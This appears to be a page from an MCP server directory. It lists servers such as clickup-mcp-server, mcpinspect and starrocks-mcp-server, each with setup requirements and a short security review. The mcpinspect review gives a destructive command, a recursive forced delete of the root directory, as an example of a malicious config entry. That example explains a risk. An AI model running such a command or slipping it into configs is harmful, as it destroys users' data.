Stop Searching. Start Trusting.

The curated directory of MCP servers, vetted for security, efficiency, and quality.

Browse DirectoryWhy Us?

Tired of the MCP "Marketplace" Chaos?

We built MCPScout.ai to solve the ecosystems biggest pain points.

No Insecure Dumps

We manually analyze every server for basic security flaws.

Easy Setup

Our gotcha notes warn you about complex setups.

Avoid "Token Hogs"

We estimate token costs for cost-effective agents.

Products, Not Demos

We filter out "Hello World" demos.

CATEGORIES:
SORT:

Vetted Servers(8554)

33
3
Low Cost
Chisanan232 icon

clickup-mcp-server

by Chisanan232

Sec6

Facilitate AI-enabled applications interacting with the ClickUp API through a standardized Model, Capability, Protocol (MCP) server.

Setup Requirements

  • ⚠️Requires Python 3.13 or higher.
  • ⚠️A ClickUp API Token is mandatory for server operation and must be provided via `--token` or the `CLICKUP_API_TOKEN` environment variable.
  • ⚠️The default CORS policy and lack of webhook signature validation make it insecure for public deployment without careful configuration changes.
  • ⚠️If the `QUEUE_BACKEND` environment variable is set to anything other than `local`, an external message queue infrastructure (e.g., Kafka, Redis) will be required.
Verified SafeView Analysis
The server uses `SecretStr` for API tokens and retrieves them from environment variables or .env files, which is good practice. However, the default CORS configuration allows all origins (`*`) and credentials (`true`), which is a significant security risk if the server is publicly exposed without adjusting these settings. Additionally, the webhook ingress endpoint (`/webhook/clickup`) appears to lack explicit signature verification for incoming payloads, making it vulnerable to spoofed events. For production deployment, strict CORS policies and webhook signature validation are critical to implement.
Updated: 2026-01-15GitHub
33
1
Low Cost
MatMercer icon

mcpinspect

by MatMercer

Sec6

A CLI tool to inspect MCP (Model Context Protocol) servers configured for Claude Code.

Setup Requirements

  • ⚠️Requires macOS (due to keychain integration and explicit support statement)
  • ⚠️Requires a `~/.claude.json` configuration file with MCP servers defined
  • ⚠️Authentication to HTTP/SSE MCP servers relies on OAuth tokens being present in the macOS keychain, saved by Claude Code.
Verified SafeView Analysis
The `stdio` server type executes arbitrary commands and arguments directly from the `.claude.json` configuration file via `exec.CommandContext`. If the config file is compromised or contains malicious entries (e.g., a `stdio` server with `command: "rm", args: ["-rf", "/"]`), running `mcpinspect <server-name>` for such a server could lead to arbitrary code execution. The tool correctly uses the macOS keychain for OAuth tokens instead of hardcoding, which is a good security practice. However, the direct execution of user-defined commands for `stdio` servers presents a significant risk if the user's configuration file is not implicitly trusted.
Updated: 2025-11-22GitHub
33
2
Medium Cost
john-walkoe icon

uspto_fpd_mcp

by john-walkoe

Sec9

Facilitates research and analysis of USPTO Final Petition Decisions, including search, detail retrieval, and document content extraction.

Setup Requirements

  • ⚠️Requires USPTO_API_KEY (paid) for core functionality. API key format is specific (30 lowercase letters).
  • ⚠️Optional MISTRAL_API_KEY (paid, ~$0.001/page) is required for OCR of scanned documents; without it, only free PyPDF2 extraction for text-based PDFs is available.
  • ⚠️Many advanced features and cross-MCP workflows require the Patent File Wrapper (PFW) MCP to be installed and running, acting as a centralized proxy and data source.
Verified SafeView Analysis
The server demonstrates a strong commitment to security: API keys are stored securely using Windows DPAPI (or environment variables as fallback), all log output is automatically sanitized to prevent sensitive data leakage (CWE-532), and security events are explicitly logged. Network resilience features like circuit breakers, rate limiting, and connection pooling are implemented. The proxy server includes web security headers and request size limits. While a legacy hardcoded entropy for DPAPI decryption exists, it's explicitly documented as a backward compatibility measure with a migration path to a more secure, cryptographically random entropy.
Updated: 2026-01-19GitHub
33
19
Medium Cost
adambdooley icon

foundry-vtt-mcp

by adambdooley

Sec8

Connects Foundry VTT to Claude Desktop for AI-powered campaign management, character/compendium queries, content creation, and AI map generation.

Setup Requirements

  • ⚠️Requires Foundry VTT v13 and Claude Desktop with an active Claude Pro/Max plan for Model Context Protocol (MCP) access.
  • ⚠️Map generation requires a dedicated GPU with at least 8GB of VRAM. On macOS, this specifically requires an Apple Silicon (M1/M2/M3/M4) Mac.
  • ⚠️Manual installation requires Node.js version 18 or higher.
Verified SafeView Analysis
The server architecture is designed with security in mind, employing a registry pattern and Zod schemas for input validation. Critical operations, such as character data extraction and content creation, are restricted to Game Master (GM) users in Foundry VTT, with additional configurable permissions for write operations ('Allow Write Operations' setting). The use of `execSync` and `spawn` for process execution is isolated to installation scripts (e.g., for Python/ComfyUI) and internal backend management (e.g., spawning the ComfyUI service), rather than processing arbitrary user input. No direct `eval` of user input is observed. Network communication uses WebSocket and WebRTC, typical for such applications. There are no obvious hardcoded API keys or sensitive credentials exposed. The biggest remaining risks would be a vulnerability in the underlying Foundry VTT API itself, or an undiscovered injection vector in the prompt processing that could bypass validation and lead to unintended system commands, though current code mitigates this by abstracting actions through specific tools. Requires user's Claude Pro/Max plan for MCP access, which implies an additional layer of external security.
Updated: 2026-01-04GitHub
33
3
Medium Cost
OpenCSGs icon
Sec7

Provides a set of Model Context Protocol (MCP) tools for interacting with and managing various AI/ML resources (models, datasets, code, dataflows, evaluations, spaces, inferences) on the CSGHub platform, primarily for use by LLM agents.

Setup Requirements

  • ⚠️Requires Python 3.10 or higher.
  • ⚠️Requires a CSGHub account and a valid API access token ('token' parameter is mandatory for most functions).
  • ⚠️Requires `CSGHUB_SERVER_ENDPOINT` and `CSGHUB_WEB_ENDPOINT` environment variables to be correctly set, pointing to the CSGHub API and web interfaces. Depending on the specific server module (e.g., dataset, finetune, inference, space), `CSGHUB_ISSUE_ENDPOINT` and `CLUSTER_ID` environment variables may also be required.
  • ⚠️The server defaults to listening on '0.0.0.0:8000', which means it will be accessible on all network interfaces. This necessitates careful network configuration (e.g., firewalls, reverse proxies) in production deployments.
Verified SafeView Analysis
The codebase avoids direct use of dangerous functions like 'eval' or 'exec'. API endpoints and critical configuration values are retrieved from environment variables, which is a good practice to prevent hardcoded secrets. Access tokens are passed via 'Authorization: Bearer' headers for API calls. However, several modules default to binding the MCP server to '0.0.0.0:8000', which means it will listen on all network interfaces; this poses a security risk if deployed in a public-facing environment without proper firewalling or a reverse proxy. Additionally, error responses may return the raw upstream API error messages, potentially exposing internal details.
Updated: 2026-01-14GitHub
33
2
Medium Cost
tracymacding icon

starrocks-mcp-server

by tracymacding

Sec3

Provides AI clients with intelligent diagnostic and analysis capabilities for StarRocks database instances.

Setup Requirements

  • ⚠️Node.js >= 18.0.0 is a strict requirement.
  • ⚠️Requires an external 'StarRocks Expert' Central API server to be running and accessible.
  • ⚠️Requires SSH access (user, key path, potentially password) to StarRocks cluster nodes for advanced diagnostic features like log fetching.
Review RequiredView Analysis
The server acts as a proxy to execute SQL queries, Prometheus queries, local CLI commands, and remote SSH commands. The commands and queries are orchestrated by an external 'StarRocks Expert' Central API. A critical security risk exists if the Central API is compromised, as the MCP server will directly execute arbitrary shell commands received from it, both locally and remotely via SSH. This makes the server highly vulnerable to remote code execution if the Central API is not fully trusted and secured. Sensitive information is masked in logs but not during execution of commands.
Updated: 2026-01-16GitHub
33
1
Medium Cost
dykeruv icon

argus-mcp

by dykeruv

Sec9

AI-powered code review and quality enhancement for multiple programming languages and environments.

Setup Requirements

  • ⚠️Requires Python 3.8 or higher.
  • ⚠️Requires one or more paid API keys (GLM_API_KEY, OPENROUTER_API_KEY) from z.ai or OpenRouter.
Verified SafeView Analysis
The server demonstrates strong security awareness by explicitly enforcing API key protection via environment variables and providing clear guidelines in `SECURITY.md`. Input validation is present, and file paths are sanitized. The core logic uses static code analysis (AST parsing) and sends code to external AI models for review, rather than executing user-provided code locally, which mitigates many direct execution risks. The server's design as a local stdin/stdout tool minimizes external network attack surface. External dependencies (AI providers) are an inherent risk but are managed with retries and fallbacks.
Updated: 2026-01-19GitHub
33
2
Medium Cost
marksplayzc icon

Network-Query-Tool

by marksplayzc

Sec9

A web-based network diagnostic tool for performing WHOIS, DNS lookups, IP information, ping, traceroute, and other network health checks.

Setup Requirements

  • ⚠️Requires a PHP-enabled web server (e.g., Apache, Nginx with PHP-FPM)
  • ⚠️Requires PHP 'zlib' extension for optimal gzip compression
  • ⚠️Server requires outbound internet access on ports like 43 (WHOIS) and 53 (DNS) for full functionality
Verified SafeView Analysis
The source code demonstrates strong security practices for a PHP web application. It includes robust security headers (e.g., Strict-Transport-Security, X-Frame-Options, Content-Security-Policy with nonce), enforces HTTPS redirection, uses `htmlspecialchars()` for output encoding to prevent XSS, and `filter_var()` for input validation. Dangerous functions like `eval()` or direct shell command execution (`exec`, `shell_exec`) are not present. Network operations (WHOIS, DNS, ASN lookup) are performed using standard PHP functions (`fsockopen`, `gethostbyaddr`, `dns_get_record`) which are generally safe when inputs are validated. The 'ip.php' file is intentionally empty. The primary 'risk' is inherent to any tool performing network queries, requiring outbound internet access, but the implementation itself appears secure.
Updated: 2025-12-11GitHub
33
2
Low Cost
visa icon

mcp

by visa

Sec9

Provides a Node.js/TypeScript client for AI agents to securely integrate with Visa's Model Context Protocol (MCP) server, enabling token-managed authentication and execution of agent-driven commerce transactions.

Setup Requirements

  • ⚠️Requires Node.js >= 18.0.0
  • ⚠️Requires extensive Visa API credentials (VIC, VTS, MLE certificates) obtained through Visa Intelligent Commerce and VTS onboarding processes.
  • ⚠️Requires a user-generated RSA private key for JWT signing.
Verified SafeView Analysis
The project uses environment variables for all sensitive credentials (API keys, private keys, certificates), employs the robust 'jose' library for JWE/JWT cryptographic operations, and includes 'zod' for robust validation. These practices contribute to a high security posture for an integration client. No 'eval' or obvious malicious patterns were found. Proper and secure management of environment variables is crucial for overall security.
Updated: 2025-12-05GitHub
33
3
Medium Cost
asachs01 icon

float-mcp

by asachs01

Sec9

Provides a Model Context Protocol (MCP) server for Float.com, enabling AI assistants to manage project management, resource allocation, time tracking, and team coordination.

Setup Requirements

  • ⚠️Requires a Float.com account with API access and a valid API key (potentially a paid service).
  • ⚠️Requires Node.js 22.0.0 or later (for local installation).
  • ⚠️Docker is recommended for deployment and often used in MCP client configurations.
Verified SafeView Analysis
The server securely retrieves the Float API key from environment variables (FLOAT_API_KEY) and implements robust error handling, including rate limiting with exponential backoff. There are no signs of 'eval' or code obfuscation. A minor point is deducted for the 'test-api-key' default in development config, though it's correctly overridden in non-test environments.
Updated: 2025-11-27GitHub
33
3
Medium Cost
yaniv-golan icon

mcp-bash-framework

by yaniv-golan

Sec9

A Bash-based framework for building and running Micro-service Context Protocol (MCP) servers, enabling the creation of custom AI-integrable tools, resources, prompts, and completions.

Setup Requirements

  • ⚠️Requires 'jq' or 'gojq' for full functionality (minimal mode available without it).
  • ⚠️Requires Bash 3.2+ for core features.
  • ⚠️External tools like 'git', 'curl', 'openssl', or domain-specific binaries may be required depending on resource/tool implementations.
Verified SafeView Analysis
The framework demonstrates a high commitment to security, especially for a Bash environment. It features robust environment isolation for subprocesses (tools, providers) to prevent information leakage and privilege escalation. Extensive path validation and root containment checks guard against path traversal. Project-level shell scripts (hooks) are subject to strict ownership and permission checks, mitigating local privilege escalation risks. Input is sanitized, heavily relying on 'jq'/'gojq' for JSON processing to reduce shell injection risks. Remote authentication with constant-time token comparison helps secure proxied deployments. Network policy functions aid in preventing Server-Side Request Forgery (SSRF). 'eval' is explicitly avoided in critical path operations.
Updated: 2026-01-19GitHub
33
1
Medium Cost
jonpspri icon

n7m-mcp

by jonpspri

Sec9

Provides AI assistants with geocoding, reverse geocoding, and OpenStreetMap object lookup capabilities via the Model Context Protocol.

Setup Requirements

  • ⚠️Requires Python 3.12 or newer.
  • ⚠️Relies on external Nominatim API, subject to its fair use policy (1 request per second).
  • ⚠️Requires `uvx` for the fastest setup as an MCP server, or `uv` for local development.
Verified SafeView Analysis
The server uses `httpx` for external API calls to Nominatim, and internally enforces Nominatim's rate limit of 1 request per second. Input parameters are type-hinted and validated using Pydantic models for API responses. No `eval` or obvious obfuscation found. Environment variables are used for configuration, preventing hardcoded secrets. The HTTP client instance is managed correctly for async operations. The primary external dependency is OpenStreetMap's Nominatim service.
Updated: 2025-11-23GitHub
PreviousPage 159 of 713Next